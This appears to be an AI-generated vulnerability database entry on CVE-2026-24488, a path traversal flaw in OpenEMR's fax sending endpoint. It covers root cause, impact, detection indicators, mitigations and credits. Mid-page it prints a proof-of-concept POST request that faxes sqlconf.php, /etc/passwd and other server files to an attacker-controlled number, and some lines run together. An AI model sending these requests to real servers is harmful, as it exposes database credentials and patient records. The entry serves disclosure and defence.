
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-24488 is an arbitrary file exfiltration vulnerability in OpenEMR's fax sending endpoint, classified as a Path Traversal flaw (CWE-22). It affects OpenEMR versions up to and including 8.0.0, allowing any authenticated user to read and transmit any server-side file — including database credentials, patient documents, system files, and source code — via fax to an attacker-controlled phone number. The vulnerability was published on February 27, 2026, with a CVSS v3.1 base score of 6.5 (Medium) (GitHub Advisory, Red Hat CVE).
The root cause is improper path validation in the sendFax() method of EtherFaxActions.php (lines 177–221). The endpoint accepts a user-controlled file parameter, strips the file:// prefix if present, and calls realpath() to normalize the path — but realpath() only resolves symbolic links and normalizes the path without restricting access to any specific directory. The normalized path is then streamed directly to the EtherFax gateway API without any authorization check or directory boundary enforcement, effectively bypassing OpenEMR's document access control system. An attacker with a valid session and access to the Fax/SMS module can supply any absolute file path readable by the web server process (GitHub Advisory, Patch Reference).
An authenticated attacker can exfiltrate any file readable by the web server user, including database credentials (sqlconf.php), patient health records (PHI/PII), system files such as /etc/passwd, PHP session files, and application source code. Because database credentials can be obtained, successful exploitation may enable further lateral movement including direct database access, privilege escalation, or full system compromise. The confidentiality impact is high, with no integrity or availability impact from this specific vulnerability alone (GitHub Advisory).
A proof-of-concept (PoC) exploit is publicly available via the GitHub Security Advisory, demonstrating exploitation via a simple HTTP POST request. As of the time of publication, there is no evidence of active in-the-wild exploitation. The EPSS score is approximately 0.04%, indicating low but non-zero probability of exploitation in the near term. The vulnerability is not currently listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires valid credentials and the Fax/SMS module to be enabled, but no elevated privileges beyond a standard authenticated user are needed (GitHub Advisory).
file parameter and an attacker-controlled fax number in the phone parameter:POST /interface/modules/custom_modules/oe-module-faxsms/sendFax?type=fax HTTP/1.1
Host: target-openemr.com
Content-Type: application/x-www-form-urlencoded
Cookie: OpenEMR=<valid_session>
file=/var/www/openemr/sites/default/sqlconf.php&phone=+15551234567file=/etc/passwd&phone=+15551234567
file=/var/www/openemr/interface/globals.php&phone=+15551234567/interface/modules/custom_modules/oe-module-faxsms/sendFax?type=fax with file parameters containing absolute paths (e.g., /etc/, /var/www/, /var/lib/php/sessions/) rather than expected document references; outbound fax API calls to EtherFax gateway with unexpected file content.file= values pointing to system or configuration files; application logs recording fax transmissions to unfamiliar or external phone numbers not associated with known patients or facilities.oe_faxsms_queue database table may reveal entries with unusual filenames or paths.oe_faxsms_queue table with called_number values not matching known organizational fax recipients, or details_json referencing system file paths (GitHub Advisory).A patched version of the vulnerable code is available in the OpenEMR repository at the v7_0_4 branch, which implements proper path restriction and authorization checks in the sendFax() method. Organizations should upgrade to a patched release as soon as one is officially published. As interim mitigations: disable or restrict access to the Fax/SMS (EtherFax) module for non-essential users; implement network-level controls to limit access to the fax endpoint; and monitor fax transmission logs for anomalous activity. Additionally, enforce the principle of least privilege for OpenEMR user accounts (GitHub Advisory, Patch Reference).
The vulnerability was reported by researchers simecek, pavelkohout396, and stanislavfortaisle (affiliated with Aisle), who also disclosed 38 critical security vulnerabilities in healthcare software used by 100,000 providers, as noted in a blog post from Aisle. The advisory was published by OpenEMR maintainer bradymiller on GitHub. No significant broader media coverage or notable social media commentary beyond standard CVE tracking feeds has been identified at this time (GitHub Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."